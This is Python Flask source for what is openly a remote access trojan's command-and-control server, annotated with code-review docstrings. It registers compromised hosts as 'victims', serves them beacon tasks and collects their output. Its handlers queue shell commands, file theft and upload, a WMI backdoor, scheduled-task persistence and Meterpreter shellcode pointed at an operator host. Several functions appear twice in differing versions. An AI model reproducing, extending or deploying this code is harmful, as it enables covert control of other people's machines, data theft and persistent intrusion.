def check():
    """Register the calling host and hand it the initial payload template.

    Derives a ``signature`` from the URL-decoded request body plus
    ``SECRET_KEY``; that value is then used both as the client identifier
    and as the pid of the ``init`` task.  Returns ``p.begin()`` rendered as a
    Jinja template with ``server`` and ``signature`` injected.

    NOTE(review): ``md5(data + SECRET_KEY)`` is a plain hash of a
    concatenation, not an HMAC, and md5 is not collision resistant; it
    deduplicates hosts, it does not authenticate them.  ``request.get_data()``
    is untrusted, client-supplied input used without any length or format
    check (the TODO below).  Layout was reconstructed from a collapsed
    listing; nesting of the init-task line under the ``if`` is inferred.
    """
    global server
    # Raw request body, URL-decoded.  Nothing validates its shape.
    data = unquote(request.get_data())
    #TODO: add data format check
    # ``md5`` is presumably a local helper returning a 32-char hex digest
    # (rat() matches signatures against ^[0-9a-f]{32}$) — confirm.
    signature = md5(data + SECRET_KEY)
    c = victim.victim()
    p = payload.payload()
    if not c.get(signature):
        # First contact: record the host keyed by signature with its source IP.
        # ``c`` is rebound to whatever add() returns; it is not used afterwards,
        # so this is harmless, but confirm add() was meant to return the store.
        c = c.add(signature, request.remote_addr)
        # Add the initial task.  pid == signature for the init task; the second
        # rat() version on this page relies on that equality to recognise it.
        # The trailing ``4`` is not documented here — presumably a repeat/retry
        # budget; confirm against action.add.
        action.action().add(signature, signature, 'init', p.init(), 4)  #add init task
    # Stored payload text is rendered as a template, not returned verbatim.
    return render_template_string(p.begin(), server=server, signature=signature)
def rat(signature):
    """Beacon endpoint: GET fetches the next task, any other method stores output.

    ``signature`` is the client id from the URL; it must be 32 hex chars and
    already registered.  On GET the client's heartbeat is refreshed and the
    pending task payload (or a fixed idle marker) is rendered as a Jinja
    template.  Otherwise the request body is base64-encoded and stored as
    feedback for the ``pid`` given in the query string.  Every failure path
    returns the bare string "error" with HTTP 200.

    NOTE(review): ``p`` is created but never used, and ``cl`` repeats the
    ``c.get`` guard already made above.  ``request.get_data().encode('base64')``
    is the Python 2 codec form; on Python 3 a bytes object has no ``encode``.
    ``re.match(pattern, pid)`` raises TypeError when ``pid`` is absent
    (``request.args.get`` returns None).  Layout was reconstructed from a
    collapsed listing.
    """
    global server
    c = victim.victim()
    a = action.action()
    p = payload.payload()  # unused in this version
    pattern = r"^[0-9a-f]{32}$"
    if not re.match(pattern, signature):
        return "error"
    if not c.get(signature):
        return 'error'
    if request.method == 'GET':
        cl = c.get(signature)  # redundant: same lookup as the guard above
        if not cl:
            return "error"
        c.heartbeat(signature)
        ac = a.gettask(signature)
        if ac:
            exploit = ac['payload']
            pid = ac['pid']
        else:
            # Idle response: both fields are the fixed base64 string
            # 'aGJlYXQ=' (decodes to "hbeat"), a stable marker of an idle beacon.
            exploit = 'aGJlYXQ='
            pid = 'aGJlYXQ='
        # The stored task text is rendered as a Jinja template.
        return render_template_string(exploit, server=server, signature=signature, pid=pid)
    else:
        pid = request.args.get('pid')
        pattern = r"^[0-9a-f]{32}$"
        if not re.match(pattern, pid):
            return "error"
        # Output is kept base64-encoded; getResult() decodes it on read.
        data = request.get_data().encode('base64')
        a.setfeedback(pid, data)
        return ''
def getResult():
    """Return the stored, base64-decoded output of task ``pid``.

    Reads ``signature`` and ``pid`` from form or query values.  When the task
    exists and has feedback, returns the decoded bytes with HTTP 200;
    otherwise returns "error" with HTTP 500.

    NOTE(review): ``signature`` is read but never compared with the task, so
    any known ``pid`` can be fetched regardless of which client it belongs
    to; no authentication is visible in this block (presumably the route
    decorator outside this view gates it — confirm).  ``request.values[...]``
    raises on a missing key, which Flask turns into a 400.
    ``.decode("base64")`` is the Python 2 codec form.
    """
    signature = request.values["signature"]  # unused beyond being read
    pid = request.values["pid"]
    a = action.action()
    data = a.get(pid)
    if data and data.get("feedback"):
        # Feedback was stored base64-encoded by rat(); undo that here.
        return data["feedback"].decode("base64")
    else:
        return make_response("error", 500)
def setCmd():
    """Queue a command task for client ``signature`` and return the new pid.

    ``pid`` is the md5 of the current time, ``config.SECRET_KEY``, the
    signature, the command and a ``random.random()`` draw.  The task is stored
    with the label ``"[cmd] " + cmd`` and the payload built by ``p.cmd``.

    NOTE(review): ``request.form.get(...).strip()`` raises AttributeError
    (HTTP 500) when either field is missing.  ``random.random()`` is not
    cryptographically random, and getResult() uses the pid as the only key
    to read output, so treat it as an identifier, not a secret.  ``cmd`` is
    stored unvalidated in the task label.  No authentication is visible in
    this block.  ``config.SECRET_KEY`` is used here whereas check() uses a
    bare ``SECRET_KEY`` — confirm they refer to the same value.
    """
    signature = request.form.get("signature").strip()
    cmd = request.form.get("cmd").strip()
    a = action.action()
    p = payload.payload()
    # ``md5`` presumably returns a 32-char hex digest, matching rat()'s pid regex.
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random()))
    exploit = p.cmd(cmd)
    a.add(pid, signature, "[cmd] " + cmd, exploit)
    return pid
def setUpload():
    """Queue an upload task for client ``signature`` and return the new pid.

    Reads ``signature`` and ``filePath`` from the form, builds the task with
    ``p.upload(filePath)`` and stores it under the label
    ``"[upload] " + filePath``.

    NOTE(review): ``request.form.get(...).strip()`` raises AttributeError
    (HTTP 500) when a field is missing.  ``filePath`` is not validated or
    normalised before being embedded in the payload and the label.  The pid
    construction mirrors setCmd(): md5 over time, ``config.SECRET_KEY``,
    signature, the path and ``random.random()``.  No authentication is
    visible in this block.
    """
    signature = request.form.get("signature").strip()
    filePath = request.form.get("filePath").strip()
    a = action.action()
    p = payload.payload()
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random()))
    exploit = p.upload(filePath)
    a.add(pid, signature, "[upload] " + filePath, exploit)
    return pid
def getResult():
    """Return the stored, base64-decoded output of task ``pid``.

    Same logic as the earlier getResult() on this page, differing only in
    quote style.  Reads ``signature`` and ``pid`` from form or query values;
    returns the decoded feedback with HTTP 200, else "error" with HTTP 500.

    NOTE(review): ``signature`` is never compared with the task, so any
    known ``pid`` is readable regardless of owner; no authentication is
    visible in this block.  ``request.values[...]`` raises on a missing key
    (Flask returns 400).  ``.decode('base64')`` is the Python 2 codec form.
    """
    signature = request.values['signature']  # unused beyond being read
    pid = request.values['pid']
    a = action.action()
    data = a.get(pid)
    if data and data.get('feedback'):
        # Feedback was stored base64-encoded by rat(); undo that here.
        return data['feedback'].decode('base64')
    else:
        return make_response('error', 500)
def setWmiBackdoor():
    """Queue the ``p.WmiBackdoor()`` task for client ``signature``; return its pid.

    Only ``signature`` is read from the form.  The task is stored with the
    fixed label ``'[WmiBackdoor] launched'``.

    NOTE(review): ``request.form.get('signature').strip()`` raises
    AttributeError (HTTP 500) when the field is missing.  The pid is md5 over
    time, ``config.SECRET_KEY``, the signature and ``random.random()``, as in
    the other set* handlers.  No authentication is visible in this block.
    """
    signature = request.form.get('signature').strip()
    a = action.action()
    p = payload.payload()
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + str(random.random()))
    exploit = p.WmiBackdoor()
    a.add(pid, signature, '[WmiBackdoor] launched', exploit)
    return pid
def setExec():
    """Queue a ``p.run(cmd)`` task for client ``signature`` and return its pid.

    Structurally identical to setCmd() except that the payload comes from
    ``p.run`` instead of ``p.cmd``.

    NOTE(review): the task label is ``'[cmd] ' + cmd``, the same prefix
    setCmd() uses, so the two task kinds cannot be told apart in the stored
    action log.  ``request.form.get(...).strip()`` raises AttributeError
    (HTTP 500) on a missing field.  ``cmd`` is stored unvalidated.  No
    authentication is visible in this block.
    """
    signature = request.form.get('signature').strip()
    cmd = request.form.get('cmd').strip()
    a = action.action()
    p = payload.payload()
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + cmd + str(random.random()))
    exploit = p.run(cmd)
    a.add(pid, signature, '[cmd] ' + cmd, exploit)
    return pid
def setWindowsTasks():
    """Queue a ``p.WindowsTasks(t)`` task for client ``signature``; return its pid.

    ``t`` is the raw ``time`` form field; it is passed through to the payload
    builder and embedded in the label ``'[WindowsTasks] ' + t``.

    NOTE(review): ``t`` is not parsed or validated here, so any string the
    form supplies reaches ``p.WindowsTasks``.  ``request.form.get(...).strip()``
    raises AttributeError (HTTP 500) on a missing field.  No authentication
    is visible in this block.
    """
    signature = request.form.get('signature').strip()
    t = request.form.get('time').strip()
    a = action.action()
    p = payload.payload()
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + t + str(random.random()))
    exploit = p.WindowsTasks(t)
    a.add(pid, signature, '[WindowsTasks] ' + t, exploit)
    return pid
def setUpload():
    """Queue an upload task for client ``signature`` and return the new pid.

    Same logic as the earlier setUpload() on this page (quote style aside):
    reads ``signature`` and ``filePath`` from the form, builds the task with
    ``p.upload(filePath)`` and stores it under ``'[upload] ' + filePath``.

    NOTE(review): ``filePath`` is not validated or normalised.
    ``request.form.get(...).strip()`` raises AttributeError (HTTP 500) on a
    missing field.  No authentication is visible in this block.
    """
    signature = request.form.get('signature').strip()
    filePath = request.form.get('filePath').strip()
    a = action.action()
    p = payload.payload()
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + filePath + str(random.random()))
    exploit = p.upload(filePath)
    a.add(pid, signature, '[upload] ' + filePath, exploit)
    return pid
def setDownload():
    """Queue a download task for client ``signature`` and return the new pid.

    Looks up the stored file record by ``filename`` (the original name),
    appends that original name to ``savePath`` with a backslash, and stores
    the task built by ``p.download(filename, savePath)`` under a label that
    records both names and the save path.

    NOTE(review): ``d.getbyname(originalname)`` is called twice for the same
    key; if it returns None (unknown name) the ``["filename"]`` subscript
    raises TypeError (HTTP 500).  ``savePath`` is joined with a literal
    backslash, so this assumes a Windows-style client path and does no
    normalisation.  ``request.form.get(...).strip()`` raises AttributeError on
    a missing field.  No authentication is visible in this block.
    """
    signature = request.form.get("signature").strip()
    originalname = request.form.get("filename").strip()
    savePath = request.form.get("savePath").strip()
    a = action.action()
    p = payload.payload()
    d = download.download()
    # Two lookups of the same record; the second just re-reads the original name.
    filename = d.getbyname(originalname)["filename"]
    originalname = d.getbyname(originalname)["originalname"]
    savePath += "\\" + originalname
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random()))
    exploit = p.download(filename, savePath)
    a.add(pid, signature, "[download] " + originalname + "(" + filename + ")" + " [savepath] " + savePath, exploit)
    return pid
def plantMeterpreter0():
    """Queue a ``p.MeterpreterShellcode()`` task for client ``signature``; return its pid.

    Reads ``ip`` and ``port`` from the form, writes them into the shared
    settings store as ``LHOST``/``LPORT`` before building the payload, and
    stores the task under the label ``'[MeterpreterShellcode] ip:port'``.

    NOTE(review): ``LHOST``/``LPORT`` are written to a global settings object,
    not attached to the task, so two requests in flight can observe each
    other's values — presumably ``p.MeterpreterShellcode()`` reads them back
    immediately; confirm.  ``ip`` and ``port`` are not validated.
    ``request.form.get(...).strip()`` raises AttributeError (HTTP 500) on a
    missing field.  No authentication is visible in this block.
    """
    signature = request.form.get('signature').strip()
    ip = request.form.get('ip').strip()
    port = request.form.get('port').strip()
    a = action.action()
    p = payload.payload()
    s = settings.settings()
    # Shared, not per-task, state.
    s.set('LHOST', ip)
    s.set('LPORT', port)
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + str(random.random()))
    exploit = p.MeterpreterShellcode()
    a.add(pid, signature, '[MeterpreterShellcode] %s:%s' % (ip, port), exploit)
    return pid
def setDownload():
    """Queue a download task for client ``signature`` and return the new pid.

    Variant of the earlier setDownload() on this page: looks up the stored
    file record once, does not append the original name to ``savePath``, and
    passes ``savePath`` to ``p.download`` exactly as submitted.

    NOTE(review): if ``d.getbyname(originalname)`` returns None (unknown
    name) the ``['filename']`` subscript raises TypeError (HTTP 500).
    ``savePath`` is not validated or normalised.
    ``request.form.get(...).strip()`` raises AttributeError on a missing
    field.  No authentication is visible in this block.
    """
    signature = request.form.get('signature').strip()
    originalname = request.form.get('filename').strip()
    savePath = request.form.get('savePath').strip()
    a = action.action()
    p = payload.payload()
    d = download.download()
    filename = d.getbyname(originalname)['filename']
    pid = md5(str(time.time()) + config.SECRET_KEY + signature + originalname + savePath + str(random.random()))
    exploit = p.download(filename, savePath)
    a.add(pid, signature, '[download] ' + originalname + '(' + filename + ')' + ' [savepath] ' + savePath, exploit)
    return pid
def rat(signature):
    """Beacon endpoint (later variant): GET fetches a task, other methods store output.

    Compared with the earlier rat() on this page, the GET branch distinguishes
    the init task (whose pid equals the signature, see check()) from ordinary
    tasks, re-serves a task while its ``repeat`` counter is below 3, and uses
    an empty payload with pid ``'heartbeat'`` when idle.  The non-GET branch is
    unchanged: the body is base64-encoded and stored as feedback for ``pid``.

    NOTE(review): the GET branch re-creates ``c`` and repeats the regex and
    registration checks already made at the top, so that code is dead
    duplication.  ``p`` is unused.  ``request.get_data().encode('base64')``
    is the Python 2 codec form.  ``re.match(pattern, pid)`` raises TypeError
    when the ``pid`` query parameter is absent.  Layout was reconstructed
    from a collapsed listing.
    """
    global server
    c = victim.victim()
    a = action.action()
    p = payload.payload()  # unused
    pattern = r"^[0-9a-f]{32}$"
    if not re.match(pattern, signature):
        return "error"
    if not c.get(signature):
        return 'error'
    if request.method == 'GET':
        # Duplicate of the guards above.
        c = victim.victim()
        pattern = r"^[0-9a-f]{32}$"
        if not re.match(pattern, signature):
            return 'error'
        if not c.get(signature):
            return 'error'
        c.heartbeat(signature)
        #TODO: add global tasks
        # Look up unfinished tasks.
        ac = a.gettask(signature)
        if ac and signature == ac['pid']:
            # Init task (pid == signature): mark it done as soon as it is served.
            a.setfeedback(signature, 'done')
            exploit = ac['payload']
            pid = ac['pid']
        elif ac and ac['repeat'] < 3:
            # Re-serve an ordinary task until its repeat counter reaches 3;
            # addrepeat presumably increments it — confirm against action.
            exploit = ac['payload']
            pid = ac['pid']
            a.addrepeat(pid)
        else:
            # Idle response: empty template, fixed pid 'heartbeat'.
            exploit = ''
            pid = 'heartbeat'
        # The stored task text is rendered as a Jinja template.
        return render_template_string(exploit, server=server, signature=signature, pid=pid)
    else:
        pid = request.args.get('pid')
        pattern = r"^[0-9a-f]{32}$"
        if not re.match(pattern, pid):
            return "error"
        # Output is kept base64-encoded; getResult() decodes it on read.
        data = request.get_data().encode('base64')
        a.setfeedback(pid, data)
        return ''